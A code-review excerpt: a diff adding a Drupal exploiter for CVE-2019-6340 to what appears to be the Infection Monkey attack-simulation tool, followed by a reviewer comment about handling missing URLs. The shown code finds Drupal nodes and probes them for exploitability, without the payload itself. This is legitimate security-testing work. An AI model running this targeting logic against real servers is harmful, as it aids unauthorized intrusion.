monkey/infection_monkey/exploit/drupal.py

```diff
@@ -0,0 +1,161 @@
+"""
+Remote Code Execution on Drupal server - CVE-2019-6340
+Implementation is based on:
+    https://gist.github.com/leonjza/d0ab053be9b06fa020b66f00358e3d88/f9f6a5bb6605745e292bee3a4079f261d891738a.
+"""
+
+import logging
+import requests
+from urllib.parse import urljoin
+from infection_monkey.exploit.web_rce import WebRCE
+from network.network_utils import remove_port
+
+__author__ = 'Ophir Harpaz'
+
+LOG = logging.getLogger(__name__)
+
+
+def check_drupal_cache(r: requests.Response) -> bool:
+    """
+    Check if a response had the cache header.
+    """
+    return 'X-Drupal-Cache' in r.headers and r.headers['X-Drupal-Cache'] == 'HIT'
+
+
+def find_articles(base_url: str, lower: int = 1, upper: int = 10):
+    """ Find a target article that does not 404 and is not cached """
+    articles = set()
+    while lower < upper:
+        u = urljoin(base_url, str(lower))
+        r = requests.get(u)
+        if r.status_code == 200:  # found an article
+            articles.add(lower)
+        if check_drupal_cache(r):
+            LOG.info(f'Found a cached article at: {lower}, skipping')
+        lower += 1
+    return articles
+
+
+class DrupalExploiter(WebRCE):
+    _TARGET_OS_TYPE = ['linux', 'windows']
+    _EXPLOITED_SERVICE = 'Drupal Server'
+    DRUPAL_PORTS = [[80, False], [443, True]]
+
+    def __init__(self, host):
+        super(DrupalExploiter, self).__init__(host)
+
+    def get_exploit_config(self):
+        """
+        We override this function because the exploits requires a special extension in the URL, "node",
+        e.g. an exploited URL would be http://172.1.2.3:<port>/node/3.
+        :return: the Drupal exploit config
+        """
+        exploit_config = super(DrupalExploiter, self).get_exploit_config()
+        exploit_config['url_extensions'] = ['node/']
+        return exploit_config
+
+    def add_vulnerable_urls(self, potential_urls, stop_checking=False):
+        """
+        We need a specific implementation of this function in order to add the URLs *with the node IDs*.
+        We therefore check, for every potential URL, all possible node IDs.
+        :param potential_urls: Potentially-vulnerable URLs
+        :param stop_checking: Stop if one vulnerable URL is found
+        :return: None (in-place addition)
+        """
+        for url in potential_urls:
+            node_ids = find_articles(url)
+            if node_ids is None:
+                LOG.info('Could not find a Drupal node to attack')
+                continue
+            for node_id in node_ids:
+                node_url = urljoin(url, str(node_id))
+                if self.check_if_exploitable(node_url):
+                    self.add_vuln_url(url)  # Where is this used?
+                    self.vulnerable_urls.append(node_url)
+                    if stop_checking:
+                        break
+        if not self.vulnerable_urls:
+            LOG.info("No vulnerable urls found")
```

Comment:
We should check if we have enough URLs here and if not - raise an error/signal that the exploit won't work ahead of time. Alternatively, we can ignore this here but take care of that case in `get_target_url`: check if the list is 0 before popping the next URL and if so raise an exception with a very descriptive message.

Reply:
a7b84b966cd6e7929cc4ac850219f0c5f164e299